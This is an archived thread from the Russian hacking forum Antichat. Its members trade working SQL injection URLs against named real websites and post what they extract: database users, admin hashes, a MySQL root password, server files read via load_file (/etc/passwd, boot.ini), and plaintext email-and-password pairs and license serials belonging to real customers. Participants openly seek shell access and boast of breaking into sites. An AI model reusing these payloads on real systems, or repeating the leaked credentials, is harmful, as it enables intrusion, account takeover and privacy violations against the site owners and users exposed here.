ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
31.01.2009, 01:44
|
|
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953
Репутация:
443
|
|
Сообщение от Gorev
Все сайты на данном хосте имеют уязвимость...выложу только один из них
В админку зайти не получается, скорей всего привязка к айпи... если у кого нибудь получится зайти а еще лучше залить шелл буду очень признателен ибо надо добратся до одного сайта на хосте. Заранее спасибо.
http://www.tshirts.ro/shop_add.php?pid=-116+UNION+SELECT+1,Concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9,10,11,12,13,14--%20&ownerid=63
Database Version: 5.0.27-log
Database name: tsh
User name: tsh@htdweb
http://www.webdesigners.ro/forum/admin/
Основное тело это webmaster c одним и тем же хешом так что думаю мы на верном пути -)
webmaster:b46b0fb4559b9f0f01635aa25ac942dd
Пароль не перебрал попробуй если переберешь в админке форума покопать я так думаю там не проблема будет залить че нить куда нить.
А вообще по их сайтам форум багнутый так что может тебе повезет всё таки через форум их достать
http://www.webdesigners.ro/forum/forum_display.php?fid=42&mid=-1784+union+select+1,Concat_ws(0x3a,version(),datab ase(),user()),3,4--&act=last#last
Database Version: 5.0.27-log
Database name: webdesigners
User name: webdesigners@htdweb
Этих людей достал но не знаю нужны ли они тебе
логин пароль мыло
emobil:cantemir : contact@htd.ro
crocodilul:cantemir : contact@htd.ro
singur:cantemir : contact@htd.ro
sexpert:cantemir : contact@htd.ro
1tuningclient : cantermir:contact@htd.ro
В общем удачи.
|
|
|
31.01.2009, 03:31
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
http://www.meridianproductivity.co.uk/news.php?article=2[sql]
Db:aaaacby_meridianproductivity
Version:5.0.32-Debian_7etch8-log
User:aaaacba_meridian@192.168.214.62
|
|
|
|
31.01.2009, 06:59
|
|
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953
Репутация:
443
|
|
Еще рут -)
https://www.rsvp.com/item.php?item=68099809809+UNION+SELECT+AES_DECRYPT (AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Database() ,0x2F2A2A2F,User(),0x3a),0x71),0x71),2,3,4,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 ,26,27,28,29,30,31,32,33,34,35,36,37,38--
Database Version: 4.1.14-nt
Database name: rsvp
User name: root@localhost
https://www.rsvp.com/item.php?item=68099809809+UNION+SELECT+AES_DECRYPT (AES_ENCRYPT(CONCAT(0x3a,password,0x2F2A2A2F,User, 0x3a),0x71),0x71),2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38+from+mysql.user--
root : 1c2e84cd19d4344c хэш MySQL : 1c2e84cd19d4344c : sli9Gnet
В базу с любых хостов под рутом -)
Читаем файло c:\boot.ini
Хех это я так отвлёкся....
https://www.rsvp.com/item.php?item=68099809809+UNION+SELECT+AES_DECRYPT (AES_ENCRYPT(CONCAT(0x3a,LOAD_FILE(0x633A2F626F6F7 42E696E69),0x3a),0x71),0x71),2,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35,36,37,38--
http://www.kknk.co.za/cpage.php?id=89798698654+UNION+SELECT+1,AES_DECRYP T(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Database( ),0x3a,User(),0x3a),0x71),0x71),3,4,5,6,7,8,9,10,1 1--
Database Version: 4.1.12-standard-log
Database name: kknk_db1
User name: sandbn_16@www37.cpt1.host-h.net
http://www.ofwguide.com/article_item.php?articleid=7898798690689+union+sel ect+1,2,Concat_ws(0x3a,version(),database(),user() ),4--
Database Version: 4.1.22-standard
Database name: ofwguide_ofwguidedb
User name: ofwguide_abbie@localhost
http://www.archidb.com/archiinfo/3.asp?div_id=09&product_id=500+or+1=@@version--&company_id=49&det_id=09544
Microsoft SQL Server 2000 - 8.00.679 (Intel X86) Aug 26 2002 15:09:48 Copyright (c) 1988-2000 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4
Код HTML:
http://www.archidb.com/archiinfo/3.asp?div_id=09&product_id=500+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('DETAILS','BOARD','CATALOG','CATALOG_TEMP','CDCONT','COMPANY','COMPANY_REJECT','D99_Tmp','DET_CODE','DET_VIEW','DETAILS_TEMP','division','dtproperties','FREE','FREEBOARD','GRP_CODE','GRP_VIEW','h_NEWS','input_c','j_BOARD','jorye','NEWSBOARD','NOTICE','poll','poll_re','POSTNO','PRODUCTS','PRODUCTS_CHECK','PRODUCTS_REJECT','PRODUCTS_TEMP','PRODUCTS_TEMP_CHECK,'PRODUCTS_TEMP_CHECK'))--&compa
Последний раз редактировалось spherics; 31.01.2009 в 08:24..
|
|
|
|
31.01.2009, 08:46
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
http://www.akvadra.ru/products.html?id=-20+union+select+concat_ws(0x3a,user,password,host, file_priv,database(),version(),user(),0x3c42523e3c 42523e,load_file(0x2f6574632f706173737764)),2,3,4, 5,6,7+from+mysql.user--
root:41a2cc174ae9076e:localhost:Y:akvadra:5.0.27:n ews@localhost:
плюс куча всяких юзверей..
|
|
|
|
31.01.2009, 10:52
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964
Репутация:
302
|
|
http://www.wowpourlesnuls.fr/images.php?img=-1%20union%20select%201,group_concat(table_name)%20 from%20information_schema.tables%20%20--
===============
http://www.theonlineadnetwork.com/affiliates/sim.php?itemid=-1%20union%20select%201,group_concat(column_name),3 ,4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_name=0x41646d696e-- (Пароль админа и всех юзеров без хеша, пейпал данныи и т.д.))
===============
http://desilassi.com/song.php?l_id=-1%20union%20select%201,2,concat(log_id,0x3a,log_na me,0x3a,log_pass,0x3a,log_emailid,0x3a,mailing_lis t,0x3a,conform),4,5,6,7,8%20from%20desi_login-- (Туева хуча пользователей паролей и мыльников и никаких хешей =)) Я уже окло 50 идиотов отобрал которые мыльники регают с одинаковыми паролями как и на сайте ))
ПСЖ че то седня день удачдный, больше 10 сайтов за вечер хакнул =))
PS: ВОт админские 1:admin:admin6002
Найти бы админку... =))
Последний раз редактировалось jokester; 31.01.2009 в 20:04..
Причина: Объединил
|
|
|
|
31.01.2009, 21:09
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108
Репутация:
445
|
|
PR5
http://mial.cs.sfu.ca/newsItem.php?id=-1+union+select+1,Username,3,Password,5,6,7,8+from+ User--
Пароль почему то пустой
Кто хочет, сам пусть ковыряется
Админка mial.cs.sfu.ca/admin
Последний раз редактировалось diznt; 31.01.2009 в 21:15..
|
|
|
|
31.01.2009, 22:24
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964
Репутация:
302
|
|
http://www.visa-tour.ru/sim.php?parent_id=-1%20union%20select%201,group_concat(table_name),3, 4,5,6,7,8,9%20from%20information_schema.tables--
|
|
|
|
01.02.2009, 06:00
|
|
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953
Репутация:
443
|
|
Программа какая-то серьезная 500 $ стоимость лицензии Project Management Methodology
Проданно более 1500 лиц.Ну да ладно неважно -)
http://www.mpmm.com/news-item.php?id=468796872+UNION+SELECT+1,2,AES_DECRYPT (AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Database() ,0x3a,User(),0x3a),0x71),0x71),4,5,6,7--
Database Version: 5.0.27-community-nt
Database name: jwestland
User name: jwestland@localhost
http://www.mpmm.com/news-item.php?id=468796872+UNION+SELECT+1,2,AES_DECRYPT (AES_ENCRYPT(CONCAT(0x3a,(SELECT+CONCAT(email,0x3a ,password)+FROM+jwestland.users+LIMIT+5,1),0x3a),0 x71),0x71),4,5,6,7--
Fields email  assword
: jason@method123.com : Klimber56
: remko@paradise.net.nz : pukeora
: bassam@eim.ae : QPGklPZ
: dunnigr@socom.mil : GM78tBm
: kasboko@yahoo.com :
: grarms@ship.edu : allison
http://www.mpmm.com/news-item.php?id=468796872+UNION+SELECT+1,2,AES_DECRYPT (AES_ENCRYPT(CONCAT(0x3a,(SELECT+CONCAT(user_id,0x 3a,version,0x3a,license_id,0x3a,license_num,0x3a,s erial_no,0x3a,maint_expiry)+FROM+jwestland.user_pr oducts+LIMIT+1505,1),0x3a),0x71),0x71),4,5,6,7--
Fields user_id:version:license_id:license_num:serial_no:m aint_expiry
:1704 : educational : 0:1:682R6-TQYVZ-28O0U-EHV32:2009-07-11 08:41:28
:1705 rofessional : 0:2:IVUGX-7M7CZ-XK0A3-CYSS1:2009-07-11 09:59:24
:1706:educational : 0:1:IWWHM-TOAAZ-9A3OW-PT9R3:2009-07-11 10:09:35
:1707 rofessional : 0:1:5NEB7-X4YCZ-2OG32-DAJJ5:2009-07-11 11:54:52
:1709 rofessional : 0:1:HAXR4-G6VEZ-Y3LGW-LP5N4:2009-07-13 09:48:56
:1710:standard : 0:1:LDOB0-GDVQZ-L86WV-9AP02:2009-07-14 02:40:48
Таблеточки таблеточки -)
http://www.dreddy-clinic.com/details.php?product_id=13876876859+union+select+1, 2,3,4,5,6,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,Vers ion(),0x3a,Database(),0x3a,User(),0x3a),0x71),0x71 ),8,9,10,11,12,13,14,15,16,17,18,19,20--
Database Version: 5.0.16-log
Database name: dreddy_clinic
User name: dreddy-clinic@localhost
Дядя или Тётя Админ суть не в этом
Код HTML:
http://www.dreddy-clinic.com/details.php?product_id=13876876859+UNION+SELECT+1,2,3,4,5,6,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,(SELECT+CONCAT(u,0x3a,pass,0x3a,enable)+FROM+dreddy_clinic.u+LIMIT+0,1),0x3a),0x71),0x71),8,9,10,11,12,13,14,15,16,17,18,19,20--
dreddy-clinic : 408c05fba1f0a28b9a74ddaf6f79991d :
Теперь дядей Тётей из пользователей
Код HTML:
http://www.dreddy-clinic.com/details.php?product_id=13876876859+UNION+SELECT+1,2,3,4,5,6,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,(SELECT+CONCAT(username,0x3a,password,0x3a,email)+FROM+dreddy_clinic.users+LIMIT+1,1),0x3a),0x71),0x71),8,9,10,11,12,13,14,15,16,17,18,19,20--
Там в общем есть еще phpbb 3 но зачем -)
Последний раз редактировалось spherics; 01.02.2009 в 06:55..
|
|
|
|
01.02.2009, 12:17
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964
Репутация:
302
|
|
http://www.fixfault.com/fix.php?grp=-1+union+select+1,group_concat(id,0x3a,group_name,0 x3a,picture_id),3%20from%20group_data%20--
|
|
|
|
01.02.2009, 13:50
|
|
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953
Репутация:
443
|
|
http://www.kyma.com/slp.php?idN=16746876876876876+UNION+SELECT+1,2,3,4 ,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3 a,Database(),0x3a,User(),0x3a),0x71),0x71),6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22-- &cat=News
Database Version: 5.0.45
Database name: kyma
User name: controls_moz@136899-web1.www.kyma.com
Дядьки админы
http://www.kyma.com/slp.php?idN=16746876876876876+UNION+SELECT+1,2,3,4 ,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,(SELECT+CONCA T(usuusuario,0x3a,usucontrasena,0x3a,usuemail)+FRO M+kyma.usu+LIMIT+2,1),0x3a),0x71),0x71),6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22-- &cat=News
: admin : kyma : pkonecny@KYMA.com
Сама Админка
http://www.kyma.com/admin/
http://www.vintagevirginiaapples.com/Shop_Show_product.php?Product_Id=2798792698+union+ select+1,2,3,4,5,6,7,concat_ws(0x3a,version(),user (),database()),9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23--
Version: 4.1.22
User: apples@localhost
Database: apples
http://www.antique-source.com/main/item.php?product_id=798198779+union+select+1,2,3,4 ,5,concat_ws(0x3a,version(),user(),database()),7,8 ,9,10,11,12,13,14,15,16,17,18,19,20--
Version: 4.1.22-max-log
User: an719ue80rce@208.109.181.115
Database: an719ue80rce
http://www.cassatt.com/resources.php?ID=77772/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
Database Version: 4.1.12
Database name: cassattMain
User name: dbCassatt@localhost
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
